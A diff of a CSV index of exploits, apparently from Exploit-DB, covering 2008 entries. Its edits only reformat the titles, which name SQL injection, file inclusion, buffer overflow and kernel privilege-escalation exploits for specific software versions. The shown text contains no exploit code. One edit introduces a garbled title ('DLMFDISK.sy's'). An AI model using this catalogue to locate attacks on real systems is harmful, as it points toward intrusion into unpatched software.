(MS08-011)",2008-02-13,chujwamwdupe,windows,local,0 5108,platforms/php/webapps/5108.txt,"Affiliate Market 0.1 Beta - 'Language' Local File Inclusion",2008-02-13,GoLd_M,php,webapps,0 @@ -4786,9 +4786,9 @@ id,file,description,date,author,platform,type,port 5139,platforms/php/webapps/5139.txt,"Mambo Component Portfolio 1.0 - 'categoryId' SQL Injection",2008-02-18,"it's my",php,webapps,0 5140,platforms/php/webapps/5140.txt,"LightBlog 9.6 - 'Username' Local File Inclusion",2008-02-18,muuratsalo,php,webapps,0 5141,platforms/windows/local/5141.c,"DESlock+ <= 3.2.6 - 'LIST' Local Kernel Memory Leak (PoC)",2008-02-18,mu-b,windows,local,0 -5142,platforms/windows/dos/5142.c,"DESlock+ <= 3.2.6 - DLMFENC.sys Local Kernel Ring0 link list zero (PoC)",2008-02-18,mu-b,windows,dos,0 +5142,platforms/windows/dos/5142.c,"DESlock+ <= 3.2.6 - 'DLMFENC.sys' Local Kernel Ring0 link list zero (PoC)",2008-02-18,mu-b,windows,dos,0 5143,platforms/windows/local/5143.c,"DESlock+ <= 3.2.6 - Local Kernel Ring0 link list zero SYSTEM Exploit",2008-02-18,mu-b,windows,local,0 -5144,platforms/windows/local/5144.c,"DESlock+ <= 3.2.6 - DLMFDISK.sys Local kernel Ring0 SYSTEM Exploit",2008-02-18,mu-b,windows,local,0 +5144,platforms/windows/local/5144.c,"DESlock+ <= 3.2.6 - 'DLMFDISK.sy's Local kernel Ring0 SYSTEM Exploit",2008-02-18,mu-b,windows,local,0 5145,platforms/php/webapps/5145.txt,"Joomla! Component com_pccookbook - (user_id) SQL Injection",2008-02-18,S@BUN,php,webapps,0 5146,platforms/php/webapps/5146.txt,"Joomla! Component com_clasifier - 'cat_id' SQL Injection",2008-02-18,S@BUN,php,webapps,0 5147,platforms/php/webapps/5147.txt,"PHP-Nuke Module books SQL - 'cid' SQL Injection",2008-02-18,S@BUN,php,webapps,0 @@ -4837,7 +4837,7 @@ id,file,description,date,author,platform,type,port 5190,platforms/windows/remote/5190.html,"Move Networks Quantum Streaming Player Control - Buffer Overflow",2008-02-26,Elazar,windows,remote,0 5191,platforms/multiple/dos/5191.c,"Apple Mac OSX xnu 1228.3.13 - IPv6-ipcomp Remote kernel Denial of Service (PoC)",2008-02-26,mu-b,multiple,dos,0 5192,platforms/php/webapps/5192.pl,"Nukedit 4.9.x - Remote Create Admin Exploit",2008-02-26,r3dm0v3,php,webapps,0 -5193,platforms/windows/remote/5193.html,"D-Link MPEG4 SHM Audio Control - (VAPGDecoder.dll 1.7.0.5) Buffer Overflow",2008-02-26,rgod,windows,remote,0 +5193,platforms/windows/remote/5193.html,"D-Link MPEG4 SHM Audio Control - 'VAPGDecoder.dll 1.7.0.5' Buffer Overflow",2008-02-26,rgod,windows,remote,0 5194,platforms/php/webapps/5194.txt,"WordPress Plugin Sniplets 1.1.2 - (Remote File Inclusion / Cross-Site Scripting / Remote Code Execution) Multiple Vulnerabilities",2008-02-26,NBBN,php,webapps,0 5195,platforms/php/webapps/5195.txt,"Mambo Component SimpleBoard 1.0.3 - 'catid' SQL Injection",2008-02-27,"it's my",php,webapps,0 5196,platforms/php/webapps/5196.pl,"eazyPortal 1.0 - 'cookie' SQL Injection",2008-02-27,Iron,php,webapps,0 @@ -4869,7 +4869,7 @@ id,file,description,date,author,platform,type,port 5222,platforms/php/webapps/5222.txt,"QuickTicket 1.5 - (qti_usr.php id) SQL Injection",2008-03-09,croconile,php,webapps,0 5223,platforms/php/webapps/5223.txt,"BM Classifieds 20080409 - Multiple SQL Injections",2008-03-09,xcorpitx,php,webapps,0 5224,platforms/linux/remote/5224.php,"VHCS 2.4.7.1 - (vhcs2_daemon) Remote Root Exploit",2008-03-09,DarkFig,linux,remote,0 -5225,platforms/windows/dos/5225.html,"KingSoft - UpdateOcx2.dll SetUninstallName() Heap Overflow (PoC)",2008-03-10,void,windows,dos,0 +5225,platforms/windows/dos/5225.html,"KingSoft - 'UpdateOcx2.dll' SetUninstallName() Heap Overflow (PoC)",2008-03-10,void,windows,dos,0 5226,platforms/php/webapps/5226.txt,"Mambo Component eWriting 1.2.1 - (cat) SQL Injection",2008-03-10,Don,php,webapps,0 5227,platforms/solaris/local/5227.c,"Solaris 8/9/10 - fifofs I_PEEK Local Kernel Memory Leak Exploit",2008-03-10,"Marco Ivaldi",solaris,local,0 5228,platforms/windows/remote/5228.txt,"acronis pxe server 2.0.0.1076 - Directory Traversal / Null Pointer",2008-03-10,"Luigi Auriemma",windows,remote,0 @@ -4899,7 +4899,7 @@ id,file,description,date,author,platform,type,port 5253,platforms/php/webapps/5253.txt,"eXV2 Module eblog 1.2 - (blog_id) SQL Injection",2008-03-14,S@BUN,php,webapps,0 5254,platforms/php/webapps/5254.txt,"eXV2 Module Viso 2.0.4.3 - (kid) SQL Injection",2008-03-14,S@BUN,php,webapps,0 5255,platforms/php/webapps/5255.txt,"eXV2 Module WebChat 1.60 - (roomid) SQL Injection",2008-03-14,S@BUN,php,webapps,0 -5256,platforms/php/webapps/5256.pl,"AuraCMS 2.2.1 - (online.php) Blind SQL Injection",2008-03-14,NTOS-Team,php,webapps,0 +5256,platforms/php/webapps/5256.pl,"AuraCMS 2.2.1 - 'X-Forwarded-For' HTTP Header Blind SQL Injection",2008-03-14,NTOS-Team,php,webapps,0 5257,platforms/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure",2008-03-14,kingcope,multiple,remote,0 5258,platforms/solaris/dos/5258.c,"SunOS 5.10 Sun Cluster - rpc.metad Denial of Service (PoC)",2008-03-14,kingcope,solaris,dos,0 5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP Authenticated Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143 @@ -4959,7 +4959,7 @@ id,file,description,date,author,platform,type,port 5316,platforms/windows/dos/5316.py,"PacketTrap Networks pt360 2.0.39 TFTPD - Remote Denial of Service",2008-03-26,muts,windows,dos,0 5317,platforms/php/webapps/5317.txt,"JAF CMS 4.0 RC2 - Multiple Remote File Inclusion",2008-03-26,CraCkEr,php,webapps,0 5318,platforms/php/webapps/5318.txt,"Joomla! Component MyAlbum 1.0 - (album) SQL Injection",2008-03-28,parad0x,php,webapps,0 -5319,platforms/php/webapps/5319.pl,"AuraCMS 2.x - (user.php) Security Code Bypass / Add Administrator Exploit",2008-03-28,NTOS-Team,php,webapps,0 +5319,platforms/php/webapps/5319.pl,"AuraCMS 2.x - 'user.php' Security Code Bypass / Add Administrator",2008-03-28,NTOS-Team,php,webapps,0 5320,platforms/windows/local/5320.txt,"Microsoft Office XP SP3 - PPT File Buffer Overflow (MS08-016)",2008-03-30,Marsu,windows,local,0 5321,platforms/windows/dos/5321.txt,"Visual Basic - 'vbe6.dll' Local Stack Overflow PoC / Denial of Service",2008-03-30,Marsu,windows,dos,0 5322,platforms/php/webapps/5322.txt,"Smoothflash - 'admin_view_image.php cid' SQL Injection",2008-03-30,S@BUN,php,webapps,0 @@ -4972,7 +4972,7 @@ id,file,description,date,author,platform,type,port 5329,platforms/php/webapps/5329.txt,"Woltlab Burning Board Addon JGS-Treffen - SQL Injection",2008-03-31,anonymous,php,webapps,0 5330,platforms/windows/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 (Windows x86) - Remote Buffer Overflow",2008-03-31,Heretic2,windows,remote,80 5331,platforms/php/webapps/5331.pl,"Neat weblog 0.2 - 'articleId' SQL Injection",2008-03-31,"Khashayar Fereidani",php,webapps,0 -5332,platforms/windows/remote/5332.html,"Real Player - rmoc3260.dll ActiveX Control Remote Code Execution",2008-04-01,Elazar,windows,remote,0 +5332,platforms/windows/remote/5332.html,"Real Player - 'rmoc3260.dll' ActiveX Control Remote Code Execution",2008-04-01,Elazar,windows,remote,0 5333,platforms/php/webapps/5333.txt,"EasyNews 40tr - (SQL Injection / Cross-Site Scripting / Local File Inclusion) SQL Injection",2008-04-01,"Khashayar Fereidani",php,webapps,0 5334,platforms/php/webapps/5334.txt,"FaScript FaPhoto 1.0 - (show.php id) SQL Injection",2008-04-01,"Khashayar Fereidani",php,webapps,0 5335,platforms/php/webapps/5335.txt,"Mambo Component ahsShop 1.51 - (vara) SQL Injection",2008-04-01,S@BUN,php,webapps,0 @@ -5099,11 +5099,11 @@ id,file,description,date,author,platform,type,port 5457,platforms/php/webapps/5457.txt,"XplodPHP AutoTutorials 2.1 - 'id' SQL Injection",2008-04-16,cO2,php,webapps,0 5458,platforms/linux/dos/5458.txt,"xine-lib 1.1.12 - NSF demuxer Stack Overflow (PoC)",2008-04-16,"Guido Landi",linux,dos,0 5459,platforms/php/webapps/5459.txt,"e107 module 123 flash chat 6.8.0 - Remote File Inclusion",2008-04-17,by_casper41,php,webapps,0 -5460,platforms/windows/dos/5460.html,"Microsoft Works 7 - WkImgSrv.dll ActiveX Denial of Service (PoC)",2008-04-17,"Shennan Wang",windows,dos,0 +5460,platforms/windows/dos/5460.html,"Microsoft Works 7 - 'WkImgSrv.dll' ActiveX Denial of Service (PoC)",2008-04-17,"Shennan Wang",windows,dos,0 5461,platforms/windows/remote/5461.rb,"Intel Centrino ipw2200BG - Wireless Driver Remote Buffer Overflow (Metasploit)",2008-04-17,oveRet,windows,remote,0 5462,platforms/windows/local/5462.py,"DivX Player 6.6.0 - '.srt' File Buffer Overflow (SEH)",2008-04-18,muts,windows,local,0 5463,platforms/php/webapps/5463.txt,"Grape Statistics 0.2a - (location) Remote File Inclusion",2008-04-18,MajnOoNxHaCkEr,php,webapps,0 -5464,platforms/php/webapps/5464.txt,"5th Avenue Shopping Cart - (category_id) SQL Injection",2008-04-18,"Aria-Security Team",php,webapps,0 +5464,platforms/php/webapps/5464.txt,"5th Avenue Shopping Cart - 'category_id' SQL Injection",2008-04-18,"Aria-Security Team",php,webapps,0 5465,platforms/php/webapps/5465.txt,"2532/Gigs 1.2.2 - Arbitrary Database Backup/Download",2008-04-18,t0pP8uZz,php,webapps,0 5466,platforms/php/webapps/5466.pl,"OpenInvoice 0.9 - Arbitrary Change User Password Exploit",2008-04-18,t0pP8uZz,php,webapps,0 5467,platforms/php/webapps/5467.txt,"PhShoutBox 1.5 - (final) Insecure Cookie Handling",2008-04-18,t0pP8uZz,php,webapps,0 @@ -5150,7 +5150,7 @@ id,file,description,date,author,platform,type,port 5508,platforms/php/webapps/5508.txt,"Jokes Site Script - 'jokes.php?catagorie' SQL Injection",2008-04-27,ProgenTR,php,webapps,0 5509,platforms/php/webapps/5509.txt,"FluentCMS - 'view.php sid' SQL Injection",2008-04-27,cO2,php,webapps,0 5510,platforms/php/webapps/5510.txt,"Content Management System for Phprojekt 0.6.1 - File Disclosure",2008-04-27,Houssamix,php,webapps,0 -5511,platforms/windows/remote/5511.html,"HP Software Update - (Hpufunction.dll 4.0.0.1) Insecure Method (PoC)",2008-04-27,callAX,windows,remote,0 +5511,platforms/windows/remote/5511.html,"HP Software Update - 'Hpufunction.dll 4.0.0.1' Insecure Method (PoC)",2008-04-27,callAX,windows,remote,0 5512,platforms/php/webapps/5512.pl,"Joomla! Component com_alphacontent - Blind SQL Injection",2008-04-27,cO2,php,webapps,0 5513,platforms/php/webapps/5513.pl,"ODFaq 2.1.0 - Blind SQL Injection",2008-04-27,cO2,php,webapps,0 5514,platforms/php/webapps/5514.pl,"Joomla! Component paxxgallery 0.2 - (gid) Blind SQL Injection",2008-04-27,ZAMUT,php,webapps,0 @@ -5169,7 +5169,7 @@ id,file,description,date,author,platform,type,port 5527,platforms/php/webapps/5527.pl,"Joomla! Component Webhosting - 'catid' Blind SQL Injection",2008-05-01,cO2,php,webapps,0 5528,platforms/php/webapps/5528.txt,"ActualAnalyzer Lite (free) 2.78 - Local File Inclusion",2008-05-01,"Khashayar Fereidani",php,webapps,0 5529,platforms/php/webapps/5529.txt,"vlbook 1.21 - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities",2008-05-01,"Khashayar Fereidani",php,webapps,0 -5530,platforms/windows/remote/5530.html,"Microsoft Works 7 - WkImgSrv.dll ActiveX Remote Buffer Overflow",2008-05-02,lhoang8500,windows,remote,0 +5530,platforms/windows/remote/5530.html,"Microsoft Works 7 - 'WkImgSrv.dll' ActiveX Remote Buffer Overflow",2008-05-02,lhoang8500,windows,remote,0 5531,platforms/php/webapps/5531.txt,"Open Auto Classifieds 1.4.3b - SQL Injection",2008-05-02,InjEctOr5,php,webapps,0 5532,platforms/php/webapps/5532.txt,"ItCMS 1.9 - (boxpop.php) Remote Code Execution",2008-05-02,Cod3rZ,php,webapps,0 5533,platforms/php/webapps/5533.txt,"BlogMe PHP - 'comments.php id' SQL Injection",2008-05-03,His0k4,php,webapps,0 @@ -5187,7 +5187,7 @@ id,file,description,date,author,platform,type,port 5545,platforms/php/webapps/5545.txt,"Kmita Mail 3.0 - (file) Remote File Inclusion",2008-05-05,K-159,php,webapps,0 5546,platforms/php/webapps/5546.txt,"BackLinkSpider (cat_id) - SQL Injection",2008-05-05,K-159,php,webapps,0 5547,platforms/windows/dos/5547.txt,"Novell eDirectory < 8.7.3 SP 10 / 8.8.2 - HTTP headers Denial of Service",2008-05-05,Nicob,windows,dos,0 -5548,platforms/php/webapps/5548.txt,"Miniweb 2.0 - (historymonth) SQL Injection",2008-05-05,HaCkeR_EgY,php,webapps,0 +5548,platforms/php/webapps/5548.txt,"Miniweb 2.0 - 'historymonth' Parameter SQL Injection",2008-05-05,HaCkeR_EgY,php,webapps,0 5549,platforms/php/webapps/5549.txt,"Power Editor 2.0 - Remote File Disclosure / Edit",2008-05-05,"Virangar Security",php,webapps,0 5550,platforms/php/webapps/5550.php,"deluxebb 1.2 - Multiple Vulnerabilities",2008-05-05,EgiX,php,webapps,0 5551,platforms/php/webapps/5551.txt,"Pre Shopping Mall 1.1 - (search.php search) SQL Injection",2008-05-06,t0pP8uZz,php,webapps,0 @@ -5208,7 +5208,7 @@ id,file,description,date,author,platform,type,port 5566,platforms/php/webapps/5566.txt,"SazCart 1.5.1 - Multiple Remote File Inclusion",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0 5567,platforms/php/webapps/5567.txt,"Cyberfolio 7.12 - (rep) Remote File Inclusion",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0 5568,platforms/php/webapps/5568.txt,"miniBloggie 1.0 - (del.php) Arbitrary Delete Post",2008-05-08,Cod3rZ,php,webapps,0 -5575,platforms/php/webapps/5575.txt,"Admidio 1.4.8 - (getfile.php) Remote File Disclosure",2008-05-09,n3v3rh00d,php,webapps,0 +5575,platforms/php/webapps/5575.txt,"Admidio 1.4.8 - 'getfile.php' Remote File Disclosure",2008-05-09,n3v3rh00d,php,webapps,0 5576,platforms/php/webapps/5576.pl,"SazCart 1.5.1 - (prodid) SQL Injection",2008-05-09,JosS,php,webapps,0 5577,platforms/php/webapps/5577.txt,"HispaH Model Search - 'cat.php cat' SQL Injection",2008-05-09,InjEctOr5,php,webapps,0 5578,platforms/php/webapps/5578.txt,"Phoenix View CMS Pre Alpha2 - (SQL Injection / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-05-09,tw8,php,webapps,0 @@ -5422,7 +5422,7 @@ id,file,description,date,author,platform,type,port 5790,platforms/multiple/remote/5790.txt,"SNMPv3 - HMAC Validation error Remote Authentication Bypass",2008-06-12,"Maurizio Agazzini",multiple,remote,161 5791,platforms/php/webapps/5791.txt,"gravity board x 2.0 Beta - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-12,"CWH Underground",php,webapps,0 5792,platforms/php/webapps/5792.txt,"Facil-CMS 0.1RC - Multiple Local File Inclusion",2008-06-12,"CWH Underground",php,webapps,0 -5793,platforms/windows/remote/5793.html,"muvee autoProducer 6.1 - (TextOut.dll) ActiveX Remote Buffer Overflow",2008-06-12,Nine:Situations:Group,windows,remote,0 +5793,platforms/windows/remote/5793.html,"muvee autoProducer 6.1 - 'TextOut.dll' ActiveX Remote Buffer Overflow",2008-06-12,Nine:Situations:Group,windows,remote,0 5794,platforms/php/webapps/5794.pl,"Clever Copy 3.0 - 'results.php' SQL Injection",2008-06-12,anonymous,php,webapps,0 5795,platforms/windows/remote/5795.html,"XChat 2.8.7b - (URI Handler) Remote Code Execution (Internet Explorer 6/7'",2008-06-13,securfrog,windows,remote,0 5796,platforms/php/webapps/5796.php,"GLLCTS2 <= 4.2.4 - (login.php detail) SQL Injection",2008-06-12,TheDefaced,php,webapps,0 @@ -5465,7 +5465,7 @@ id,file,description,date,author,platform,type,port 5834,platforms/php/webapps/5834.pl,"Comparison Engine Power 1.0 - Blind SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 5835,platforms/php/webapps/5835.txt,"Bizon-CMS 2.0 - (index.php Id) SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 5836,platforms/php/webapps/5836.txt,"Basic-CMS - 'index.php r' SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 -5837,platforms/windows/local/5837.c,"Deterministic Network Enhancer - dne2000.sys kernel Ring0 SYSTEM Exploit",2008-06-17,mu-b,windows,local,0 +5837,platforms/windows/local/5837.c,"Deterministic Network Enhancer - 'dne2000.sys' Kernel Ring0 SYSTEM Exploit",2008-06-17,mu-b,windows,local,0 5838,platforms/php/webapps/5838.txt,"FreeCMS.us 0.2 - 'index.php' SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 5839,platforms/php/webapps/5839.txt,"ClipShare < 3.0.1 - (tid) SQL Injection",2008-06-17,SuNHouSe2,php,webapps,0 5840,platforms/php/webapps/5840.txt,"easyTrade 2.x - (detail.php id) SQL Injection",2008-06-17,anonymous,php,webapps,0 @@ -5479,7 +5479,7 @@ id,file,description,date,author,platform,type,port 5848,platforms/php/webapps/5848.txt,"traindepot 0.1 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-18,"CWH Underground",php,webapps,0 5849,platforms/asp/webapps/5849.txt,"doITlive CMS 2.50 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-18,BugReport.IR,asp,webapps,0 5850,platforms/php/webapps/5850.txt,"AspWebCalendar 2008 - Arbitrary File Upload",2008-06-18,Alemin_Krali,php,webapps,0 -5851,platforms/windows/dos/5851.txt,"Visual Basic Enterprise Edition SP6 - vb6skit.dll Buffer Overflow (PoC)",2008-06-18,shinnai,windows,dos,0 +5851,platforms/windows/dos/5851.txt,"Visual Basic Enterprise Edition SP6 - 'vb6skit.dll' Buffer Overflow (PoC)",2008-06-18,shinnai,windows,dos,0 5852,platforms/php/webapps/5852.txt,"netBIOS - 'shownews.php newsid' SQL Injection",2008-06-18,"security fears team",php,webapps,0 5853,platforms/php/webapps/5853.txt,"Maxtrade AIO 1.3.23 - (categori) SQL Injection",2008-06-18,HaCkeR_EgY,php,webapps,0 5854,platforms/php/webapps/5854.txt,"Mybizz-Classifieds - 'index.php cat' SQL Injection",2008-06-18,HaCkeR_EgY,php,webapps,0 @@ -5594,7 +5594,7 @@ id,file,description,date,author,platform,type,port 5966,platforms/php/webapps/5966.pl,"Joomla! Component Xe webtv - 'id' Blind SQL Injection",2008-06-28,His0k4,php,webapps,0 5967,platforms/php/webapps/5967.txt,"SebracCMS 0.4 - Multiple SQL Injections",2008-06-28,shinmai,php,webapps,0 5968,platforms/windows/dos/5968.py,"Surgemail 39e-1 - Authenticated IMAP Remote Buffer Overflow Denial of Service",2008-06-30,"Travis Warren",windows,dos,0 -5969,platforms/php/webapps/5969.txt,"AcmlmBoard 1.A2 - (pow) SQL Injection",2008-06-30,anonymous,php,webapps,0 +5969,platforms/php/webapps/5969.txt,"AcmlmBoard 1.A2 - 'pow' SQL Injection",2008-06-30,anonymous,php,webapps,0 5970,platforms/php/webapps/5970.txt,"eSHOP100 - (SUB) SQL Injection",2008-06-30,JuDge,php,webapps,0 5971,platforms/php/webapps/5971.pl,"BareNuked CMS 1.1.0 - Arbitrary Add Admin",2008-06-30,"CWH Underground",php,webapps,0 5972,platforms/php/webapps/5972.txt,"RCM Revision Web Development - 'products.php' SQL Injection",2008-06-30,Niiub,php,webapps,0 @@ -5636,7 +5636,7 @@ id,file,description,date,author,platform,type,port 6009,platforms/php/webapps/6009.pl,"Fuzzylime CMS 3.01 - Remote Command Execution",2008-07-05,Ams,php,webapps,0 6010,platforms/php/webapps/6010.txt,"XPOZE Pro 3.06 - 'uid' SQL Injection",2008-07-06,"HIva Team",php,webapps,0 6011,platforms/php/webapps/6011.txt,"ContentNow 1.4.1 - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-07-06,"CWH Underground",php,webapps,0 -6012,platforms/windows/remote/6012.php,"CMailServer 5.4.6 - (CMailCOM.dll) Remote Overwrite (SEH)",2008-07-06,Nine:Situations:Group,windows,remote,80 +6012,platforms/windows/remote/6012.php,"CMailServer 5.4.6 - 'CMailCOM.dll' Remote Overwrite (SEH)",2008-07-06,Nine:Situations:Group,windows,remote,80 6013,platforms/osx/remote/6013.pl,"Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow",2008-07-06,krafty,osx,remote,0 6014,platforms/php/webapps/6014.txt,"SmartPPC Pay Per Click Script - '&idDirectory=' Blind SQL Injection (1)",2008-07-07,Hamtaro,php,webapps,0 6015,platforms/php/webapps/6015.txt,"WebXell Editor 0.1.3 - Arbitrary File Upload",2008-07-07,"CWH Underground",php,webapps,0 @@ -5656,7 +5656,7 @@ id,file,description,date,author,platform,type,port 6030,platforms/windows/local/6030.py,"Download Accelerator Plus DAP 8.x - '.m3u' Local Buffer Overflow",2008-07-08,h07,windows,local,0 6031,platforms/windows/local/6031.asm,"OllyDBG 1.10 and ImpREC 1.7f - (export name) Buffer Overflow (PoC)",2008-07-08,Defsanguje,windows,local,0 6032,platforms/linux/local/6032.py,"Poppler 0.8.4 - libpoppler Uninitialized pointer Code Execution (PoC)",2008-07-08,"Felipe Andres Manzano",linux,local,0 -6033,platforms/php/webapps/6033.pl,"AuraCMS 2.2.2 - (pages_data.php) Arbitrary Edit/Add/Delete Exploit",2008-07-09,k1tk4t,php,webapps,0 +6033,platforms/php/webapps/6033.pl,"AuraCMS 2.2.2 - 'pages_data.php' Arbitrary Edit/Add/Delete Exploit",2008-07-09,k1tk4t,php,webapps,0 6034,platforms/php/webapps/6034.txt,"DreamPics Builder - (page) SQL Injection",2008-07-09,"Hussin X",php,webapps,0 6035,platforms/php/webapps/6035.txt,"DreamNews Manager - 'id' SQL Injection",2008-07-10,"Hussin X",php,webapps,0 6036,platforms/php/webapps/6036.txt,"gapicms 9.0.2 - (dirDepth) Remote File Inclusion",2008-07-10,"Ghost Hacker",php,webapps,0 @@ -5795,7 +5795,7 @@ id,file,description,date,author,platform,type,port 6172,platforms/php/webapps/6172.pl,"Pligg 9.9.0 - Remote Code Execution",2008-07-30,"GulfTech Security",php,webapps,0 6173,platforms/php/webapps/6173.txt,"pligg 9.9.0 - (Cross-Site Scripting / Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2008-07-30,"GulfTech Security",php,webapps,0 6174,platforms/multiple/dos/6174.txt,"F-PROT AntiVirus 6.2.1.4252 - (malformed archive) Infinite Loop Denial of Service",2008-07-31,kokanin,multiple,dos,0 -6175,platforms/windows/remote/6175.html,"NCTsoft - AudFile.dll ActiveX Control Remote Buffer Overflow",2008-07-31,shinnai,windows,remote,0 +6175,platforms/windows/remote/6175.html,"NCTsoft - 'AudFile.dll' ActiveX Control Remote Buffer Overflow",2008-07-31,shinnai,windows,remote,0 6176,platforms/php/webapps/6176.txt,"PHPX 3.5.16 - Cookie Poisoning / Login Bypass",2008-07-31,gnix,php,webapps,0 6177,platforms/php/webapps/6177.php,"Symphony 1.7.01 - (non-patched) Remote Code Execution",2008-07-31,Raz0r,php,webapps,0 6178,platforms/php/webapps/6178.php,"Coppermine Photo Gallery 1.4.18 - Local File Inclusion / Remote Code Execution",2008-07-31,EgiX,php,webapps,0 @@ -5803,7 +5803,7 @@ id,file,description,date,author,platform,type,port 6180,platforms/php/webapps/6180.txt,"phpMyRealty - (location) SQL Injection",2008-08-01,CraCkEr,php,webapps,0 6181,platforms/windows/dos/6181.php,"RealVNC Windows Client 4.1.2 - Remote Denial of Service Crash (PoC)",2008-08-01,beford,windows,dos,0 6182,platforms/php/webapps/6182.txt,"phpAuction GPL Enhanced 2.51 - 'profile.php' SQL Injection",2008-08-01,"Hussin X",php,webapps,0 -6183,platforms/php/webapps/6183.txt,"ABG Blocking Script 1.0a - (abg_path) Remote File Inclusion",2008-08-01,Lo$er,php,webapps,0 +6183,platforms/php/webapps/6183.txt,"ABG Blocking Script 1.0a - 'abg_path' Remote File Inclusion",2008-08-01,Lo$er,php,webapps,0 6184,platforms/php/webapps/6184.txt,"E-topbiz Dating 3 PHP Script - (mail_id) SQL Injection",2008-08-01,Corwin,php,webapps,0 6185,platforms/php/webapps/6185.txt,"Scripts24 iTGP 1.0.4 - 'id' SQL Injection",2008-08-01,Mr.SQL,php,webapps,0 6186,platforms/php/webapps/6186.txt,"Scripts24 iPost 1.0.1 - 'id' SQL Injection",2008-08-01,Mr.SQL,php,webapps,0 @@ -5872,7 +5872,7 @@ id,file,description,date,author,platform,type,port 6259,platforms/php/webapps/6259.txt,"VidiScript (Avatar) - Arbitrary File Upload",2008-08-18,InjEctOr5,php,webapps,0 6260,platforms/php/webapps/6260.txt,"cyberBB 0.6 - Multiple SQL Injections",2008-08-18,cOndemned,php,webapps,0 6261,platforms/php/webapps/6261.txt,"PHP live helper 2.0.1 - Multiple Vulnerabilities",2008-08-18,"GulfTech Security",php,webapps,0 -6262,platforms/windows/dos/6262.txt,"VMware Workstation - (hcmon.sys 6.0.0.45731) Local Denial of Service",2008-08-18,g_,windows,dos,0 +6262,platforms/windows/dos/6262.txt,"VMware Workstation - 'hcmon.sys 6.0.0.45731' Local Denial of Service",2008-08-18,g_,windows,dos,0 6269,platforms/cgi/webapps/6269.txt,"TWiki 4.2.0 - (configure) Remote File Disclosure",2008-08-19,Th1nk3r,cgi,webapps,0 6270,platforms/php/webapps/6270.txt,"SFS Affiliate Directory - 'id' SQL Injection",2008-08-19,"Hussin X",php,webapps,0 6271,platforms/php/webapps/6271.txt,"Ad Board - 'id' SQL Injection",2008-08-19,"Hussin X",php,webapps,0 @@ -5952,7 +5952,7 @@ id,file,description,date,author,platform,type,port 6357,platforms/php/webapps/6357.txt,"aspwebalbum 3.2 - (Arbitrary File Upload / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-09-03,Alemin_Krali,php,webapps,0 6360,platforms/php/webapps/6360.txt,"TransLucid 1.75 - 'FCKeditor' Arbitrary File Upload",2008-09-03,BugReport.IR,php,webapps,0 6361,platforms/php/webapps/6361.txt,"Living Local Website - 'listtest.php r' SQL Injection",2008-09-03,"Hussin X",php,webapps,0 -6362,platforms/php/webapps/6362.txt,"ACG-PTP 1.0.6 - (adid) SQL Injection",2008-09-04,"Hussin X",php,webapps,0 +6362,platforms/php/webapps/6362.txt,"ACG-PTP 1.0.6 - 'adid' SQL Injection",2008-09-04,"Hussin X",php,webapps,0 6363,platforms/php/webapps/6363.txt,"qwicsite pro - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-09-04,Cr@zy_King,php,webapps,0 6364,platforms/php/webapps/6364.txt,"ACG-ScriptShop - 'cid' SQL Injection",2008-09-04,"Hussin X",php,webapps,0 6365,platforms/windows/dos/6365.php,"Google Chrome Browser 0.2.149.27 - (1583) Remote Silent Crash (PoC)",2008-09-04,WHK,windows,dos,0 @@ -6036,7 +6036,7 @@ id,file,description,date,author,platform,type,port 6451,platforms/php/webapps/6451.txt,"Talkback 2.3.6 - Multiple Local File Inclusion / PHPInfo Disclosure Vulnerabilities",2008-09-13,SirGod,php,webapps,0 6452,platforms/php/webapps/6452.txt,"phpsmartcom 0.2 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2008-09-13,r3dm0v3,php,webapps,0 6453,platforms/asp/webapps/6453.txt,"FoT Video scripti 1.1b - (oyun) SQL Injection",2008-09-13,Crackers_Child,asp,webapps,0 -6454,platforms/windows/remote/6454.html,"Microsoft Windows Media Encoder XP SP2 - wmex.dll ActiveX Buffer Overflow (MS08-053)",2008-09-13,haluznik,windows,remote,0 +6454,platforms/windows/remote/6454.html,"Microsoft Windows Media Encoder XP SP2 - 'wmex.dll' ActiveX Buffer Overflow (MS08-053)",2008-09-13,haluznik,windows,remote,0 6455,platforms/php/webapps/6455.txt,"Linkarity - 'link.php' SQL Injection",2008-09-13,"Egypt Coder",php,webapps,0 6456,platforms/php/webapps/6456.txt,"Free PHP VX Guestbook 1.06 - Arbitrary Database Backup",2008-09-13,SirGod,php,webapps,0 6457,platforms/php/webapps/6457.txt,"Free PHP VX Guestbook 1.06 - Insecure Cookie Handling",2008-09-14,Stack,php,webapps,0 @@ -6061,11 +6061,11 @@ id,file,description,date,author,platform,type,port 6476,platforms/hardware/remote/6476.html,"Cisco Router - HTTP Administration Cross-Site Request Forgery / Command Execution (1)",2008-09-17,"Jeremy Brown",hardware,remote,0 6477,platforms/hardware/remote/6477.html,"Cisco Router - HTTP Administration Cross-Site Request Forgery / Command Execution (2)",2008-09-17,"Jeremy Brown",hardware,remote,0 6478,platforms/php/webapps/6478.txt,"Technote 7 - (shop_this_skin_path) Remote File Inclusion",2008-09-17,webDEViL,php,webapps,0 -6480,platforms/php/webapps/6480.txt,"x10media mp3 search engine 1.5.5 - Remote File Inclusion",2008-09-17,THUNDER,php,webapps,0 +6480,platforms/php/webapps/6480.txt,"X10media Mp3 Search Engine 1.5.5 - Remote File Inclusion",2008-09-17,THUNDER,php,webapps,0 